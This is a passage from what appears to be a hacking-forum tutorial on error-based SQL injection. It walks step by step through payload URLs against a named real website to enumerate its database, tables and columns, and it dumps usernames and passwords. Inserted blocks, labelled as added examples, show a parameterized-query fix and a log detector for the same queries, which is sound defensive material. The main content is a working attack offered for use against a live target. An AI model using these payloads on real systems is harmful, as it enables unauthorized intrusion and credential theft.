It's definitely another type, but in this case I call it Union-Error based, since it involves UNION SELECT in the queries we're about to use.
So let's get started.
In this example we're gonna be using this site (which a member asked about in -Downfall's thread):
Code:
http://www.seenpm.org/
The vulnerable link would be:
Code:
http://www.seenpm.org/new/index.php?id=151'
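The reason a trailing quote on the id parameter produces a database error is that the page builds its SQL by pasting the request value into the statement text. The following is an added example, not the site's code: it uses a constructed in-memory SQLite table (the table name, columns and rows are assumptions for the demo) to show the vulnerable concatenation beside the hardened form that validates the type and binds the value as a parameter.

```python
import sqlite3

# Constructed in-memory stand-in for an "index.php?id=..." article lookup.
# The table name, columns and rows are assumptions made for this demo,
# not the real site's schema.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO news VALUES (?, ?)",
        [(150, "older post"), (151, "post 151"), (152, "newer post")],
    )
    return conn


def lookup_vulnerable(conn, raw_id):
    """Vulnerable pattern: the request value is pasted straight into the SQL
    text, so a trailing quote becomes part of the statement and the database
    raises a syntax error (the MySQL equivalent is what the page's probe
    id=151' relies on)."""
    sql = "SELECT title FROM news WHERE id = " + raw_id
    return conn.execute(sql).fetchone()


def lookup_safe(conn, raw_id):
    """Hardened form: enforce the expected type first, then bind the value
    as a parameter so the database never treats it as SQL."""
    if not raw_id.isdigit():
        raise ValueError("id must be a positive integer")
    return conn.execute(
        "SELECT title FROM news WHERE id = ?", (int(raw_id),)
    ).fetchone()


def probe_outcome(fn, raw_id):
    """Run one lookup on a fresh database and classify what happened, so the
    vulnerable and hardened versions can be compared side by side."""
    conn = make_db()
    try:
        return ("ok", fn(conn, raw_id))
    except ValueError as e:
        return ("rejected", str(e))
    except sqlite3.Error as e:
        # In production this message belongs in the server log, never in the
        # HTTP response: the technique on this page reads it off the page body.
        return ("error", str(e))


if __name__ == "__main__":
    for raw in ("151", "151'"):
        print(raw, "vulnerable ->", probe_outcome(lookup_vulnerable, raw))
        print(raw, "safe       ->", probe_outcome(lookup_safe, raw))
```

Binding the parameter removes the injection; keeping database error text out of the response removes the channel every query below depends on, so a hardened application does both.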
Before I go further, let me explain some of the SQL functions we're gonna be using in this tutorial, so that you'll have an idea of how the query works. Please read carefully.
Code:
count(*) = Returns the total number of records in the table/view
group by = Groups the result of the query set by one or more columns
concat = Joins its arguments into one string, so the results show in one column
information_schema = The default database
table_schema = Specified database
table_name = The current table name
limit = Limits the amount of content to be displayed
mid() = Used to extract characters from a text field
http://www.w3schools.com/sql/sql_functions.asp
NOTE: If you're just gonna copy and paste a query, make sure to reassemble it first!
The line wrapping may have put spaces in the middle of it.
Getting the version of their database (there are 2 main ways to do it):
First way:
Query:
Code:
+AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2)))
URL will look like:
Code:
http://www.seenpm.org/new/index.php?id=151+AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2)))
Results:
Code:
Duplicate entry '5.1.54-msl-usrs-sure2-log1' for key 'group_key'
Second way:
Query:
Code:
+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+from+information_schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)-- x
URL will look like:
Code:
http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+from+information_schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)-- x
Results:
Code:
Duplicate entry '5.1.54-msl-usrs-sure2-log1' for key 'group_key'
Now that we've got the version, let's extract the database:
Query used:
Code:
+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(schema_name),0x7e)+from+information_schema.schemata limit+0,1),1,25),floor(rand(0)*2)))a)-- x
URL will look like this:
Code:
http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(schema_name),0x7e)+from+information_schema.schemata limit+0,1),1,25),floor(rand(0)*2)))a)-- x
Results:
Code:
Duplicate entry 'information_schema,seenpm_2007~~1' for key 'group_key'
Note: Notice the limit 0,1),1,150) part.
This is where I raised the second mid() value from 25 to 150, just in case there were more databases to show.
I'll explain more about the mid() function in the next step.
We have the database and the version so far.
Now for the tables in their current database:
Query:
Code:
+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(table_name),0x7e)+from+information_schema.tables where table_schema=database() limit+0,1),1,25),floor(rand(0)*2)))a)-- x
URL:
Code:
http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(table_name),0x7e)+from+information_schema.tables where table_schema=database() limit+0,1),1,25),floor(rand(0)*2)))a)-- x
Results:
Code:
'links,members,menu,menu_s1' for key 'group_key'
Now read this carefully, and notice how the tables aren't completely shown.
Only about half of them are shown. This is because of the mid() function we're using.
Leave the limit 0,1 part alone and don't touch it.
What you need to alter now are the integers of the mid() function,
i.e. (mid((select+concat_ws(0x7e,group_concat(table_name),0x7e)+from+information_schema.tables where table_schema=database() limit+0,1),1,25)
Yes, that's right. Notice the 1,25.
25 can also be altered, but it's a moderate value, so leave it like that.
The number 1 is the start position: as soon as it's altered, the tables shown change with it.
Incrementing it is what's needed here.
Let's just say 15,25:
it'll display the rest of the tables.
I did a bit of reconnaissance on the site and found that the 'users' table is located at 58,25.
So the query with the URL will look like:
Code:
http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(table_name),0x7e)+from+information_schema.tables where table_schema=database() limit+0,1),58,25),floor(rand(0)*2)))a)-- x
Results:
Code:
Duplicate entry 'ers,u_page,u_par,users~~1' for key 'group_key'
Now for the columns in the specified table, i.e. users:
Query:
Code:
+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(column_name),0x7e)+from+information_schema.columns where table_name=0xHex_Table limit+0,1),1,25),floor(rand(0)*2)))a)-- x
Notice you have to convert the current table name to hex.
To do that, you can go to http://www.swingnote.com/tools/texttohex.php
URL:
Code:
http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(column_name),0x7e)+from+information_schema.columns where table_name=0x7573657273 limit+0,1),1,25),floor(rand(0)*2)))a)-- x
Now notice the mid() function:
I've incremented from 1,25 to 4,25.
Result:
Code:
'username,password,email,n1' for key 'group_key'
Now to extract the data from the desired columns
Columns we have so far: "username", "password"
Query:
Code:
+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(username,0x3a,password),0x7e)+from+users limit+0,1),1,25),floor(rand(0)*2)))a)-- x
URL:
Code:
http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(username,0x3a,password),0x7e)+from+users limit+0,1),1,25),floor(rand(0)*2)))a)-- x
Results:
Code:
Duplicate entry 'admin:admin,test:test~~1' for key 'group_key'
Notice how I didn't increment the mid() function.
This is because the content is completely shown.
Note: You can tell that the data is completely shown when there is a ~ sign (or signs) at the end.
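Every query in this walkthrough shares the same fingerprint in the web server's access log: a non-numeric id parameter, the GROUP BY / COUNT(*) double query, the floor(rand(0)*2) duplicate-key trick, and reads of information_schema. The following is an added example, not part of the original post, that turns those fingerprints into detection logic and runs it over a few constructed access-log lines (the client addresses, timestamps, sizes and paths are made up for the demo; the signatures are taken from the queries shown above).

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample access-log lines (Apache combined-style, shortened).
# Hosts, client addresses, timestamps and sizes are made up for this demo.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2012:10:00:01 +0000] "GET /new/index.php?id=151 HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2012:10:00:09 +0000] "GET /new/index.php?id=151' HTTP/1.1" 200 812
10.0.0.5 - - [01/Jan/2012:10:00:31 +0000] "GET /new/index.php?id=151+AND(SELECT%20COUNT(*)%20FROM%20(SELECT%201%20UNION%20SELECT%20null%20UNION%20SELECT%20!1)x%20GROUP%20by%20CONCAT((SELECT%20version()%20FROM%20information_schema.tables%20LIMIT%200,1),FLOOR(RAND(0)*2))) HTTP/1.1" 200 815
10.0.0.9 - - [01/Jan/2012:10:01:00 +0000] "GET /new/index.php?id=152&page=2 HTTP/1.1" 200 5090
10.0.0.5 - - [01/Jan/2012:10:02:14 +0000] "GET /new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(table_name),0x7e)+from+information_schema.tables+where+table_schema=database()+limit+0,1),1,25),floor(rand(0)*2)))a)--+x HTTP/1.1" 200 819
"""

# Request line inside a combined-format log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Signatures of the union-error (duplicate-key) technique described on this page.
SIGNATURES = {
    "dup_key_trick": re.compile(r"floor\(rand\(0\)\*2\)"),
    "group_by_count": re.compile(r"group by .*count\(\*\)|count\(\*\).*group by"),
    "schema_enum": re.compile(r"information_schema\.(tables|columns|schemata)"),
    "db_version": re.compile(r"\bversion\(\)"),
}


def normalise(path):
    """Decode %xx and '+' encoding and collapse whitespace, so that differently
    encoded versions of the same query are compared alike."""
    decoded = unquote_plus(path)
    return re.sub(r"\s+", " ", decoded).lower()


def check_request(path):
    """Return the list of reasons a request path looks like this technique
    (empty list means clean)."""
    reasons = []
    norm = normalise(path)
    params = parse_qs(urlsplit(norm).query, keep_blank_values=True)
    # The application expects a numeric id; anything else is at least a probe.
    if any(not value.isdigit() for value in params.get("id", [])):
        reasons.append("non_numeric_id")
    for name, pattern in SIGNATURES.items():
        if pattern.search(norm):
            reasons.append(name)
    return reasons


def scan_log(text):
    """Yield (line number, reasons) for every suspicious request in the log."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        reasons = check_request(match.group(1))
        if reasons:
            hits.append((lineno, reasons))
    return hits


if __name__ == "__main__":
    for lineno, reasons in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(reasons)}")
```

The "non_numeric_id" check alone already catches the first probe (id=151'), before any of the SQL keywords appear; the signature matches then grade how far the enumeration has progressed. A small, steady response size on a normally large page, as in the constructed lines above, is a useful secondary hint that an error page is being returned in place of content.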